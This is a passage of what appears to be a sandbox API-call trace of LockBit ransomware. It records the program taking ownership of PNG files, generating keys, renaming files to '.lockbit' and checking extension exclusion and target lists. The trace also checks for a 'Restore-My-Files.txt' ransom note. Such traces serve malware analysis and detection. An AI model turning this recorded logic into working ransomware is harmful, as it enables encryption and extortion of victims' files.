[3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.871] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.872] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.872] CloseHandle (hObject=0x3ac) returned 1 [0085.872] free (_Block=0x77d800) [0085.872] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0085.872] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.872] malloc (_Size=0x40068) returned 0x3df0008 [0085.872] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3081) returned 1 [0085.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.873] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0085.873] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.873] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.873] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0085.873] ReadFile (in: hFile=0x3ac, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0085.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.880] malloc (_Size=0xde) returned 0x1ff1e60 [0085.880] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xde, FileInformationClass=0xa) returned 0x0 [0085.880] free (_Block=0x1ff1e60) [0085.880] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.880] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.880] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.880] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f92fbec, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f92fbec, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6114, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflect.png", cAlternateFileName="")) returned 1 [0085.880] lstrcmpiW (lpString1=".", lpString2="reflect.png") returned -1 [0085.880] lstrcmpiW (lpString1="..", lpString2="reflect.png") returned -1 [0085.880] PathFindExtensionW (pszPath="reflect.png") returned=".png" [0085.880] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.880] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.881] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.881] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.881] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.881] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.881] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.882] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.882] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="reflect.png") returned 1 [0085.882] lstrcmpiW (lpString1="ntldr", lpString2="reflect.png") returned -1 [0085.882] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="reflect.png") returned -1 [0085.882] lstrcmpiW (lpString1="bootsect.bak", lpString2="reflect.png") returned -1 [0085.883] lstrcmpiW (lpString1="autorun.inf", lpString2="reflect.png") returned -1 [0085.883] lstrcmpiW (lpString1="thumbs.db", lpString2="reflect.png") returned 1 [0085.883] lstrcmpiW (lpString1="iconcache.db", lpString2="reflect.png") returned -1 [0085.883] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.883] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png") returned=".png" [0085.883] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.883] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.883] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.883] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.884] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.884] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.884] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.884] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png.lockbit") returned 75 [0085.884] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.888] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.888] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.888] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.888] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.889] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.889] RtlFreeAnsiString (AnsiString="\\") [0085.889] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0085.889] malloc (_Size=0x200) returned 0x77d800 [0085.889] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.889] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.889] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.889] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.889] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.890] CloseHandle (hObject=0x3bc) returned 1 [0085.890] free (_Block=0x77d800) [0085.890] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\reflect.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0085.890] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.890] malloc (_Size=0x40068) returned 0x1ff1e60 [0085.891] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24852) returned 1 [0085.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0085.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.892] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.892] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0085.892] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0085.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.894] malloc (_Size=0xac) returned 0x77d800 [0085.895] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xac, FileInformationClass=0xa) returned 0x0 [0085.895] free (_Block=0x77d800) [0085.895] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles") returned 1 [0085.895] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt") returned 76 [0085.895] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.895] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f97bea6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f97bea6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ef31505, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2fcdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="vistabg.png", cAlternateFileName="")) returned 1 [0085.895] lstrcmpiW (lpString1=".", lpString2="vistabg.png") returned -1 [0085.895] lstrcmpiW (lpString1="..", lpString2="vistabg.png") returned -1 [0085.895] PathFindExtensionW (pszPath="vistabg.png") returned=".png" [0085.895] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.895] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.896] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.896] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.896] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.897] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.897] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.898] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.898] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="ntldr", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="bootsect.bak", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="autorun.inf", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="thumbs.db", lpString2="vistabg.png") returned -1 [0085.898] lstrcmpiW (lpString1="iconcache.db", lpString2="vistabg.png") returned -1 [0085.898] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\") returned="" [0085.898] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png") returned=".png" [0085.898] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.898] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.898] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.898] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.899] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.899] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.899] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.899] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.899] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.899] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.900] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.900] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.900] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png.lockbit") returned 75 [0085.900] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.900] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.901] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.901] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.901] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.901] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.901] RtlFreeAnsiString (AnsiString="\\") [0085.901] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c0) returned 0x0 [0085.901] malloc (_Size=0x200) returned 0x77d800 [0085.901] NtQueryInformationToken (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.902] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.902] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.902] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.902] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.902] CloseHandle (hObject=0x3c0) returned 1 [0085.902] free (_Block=0x77d800) [0085.903] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\rectangles\\vistabg.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0085.903] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.903] malloc (_Size=0x40068) returned 0x3d70048 [0085.903] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=195804) returned 1 [0085.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.903] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.903] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0085.903] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.904] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0085.904] ReadFile (in: hFile=0x3c0, lpBuffer=0x3d7007c, 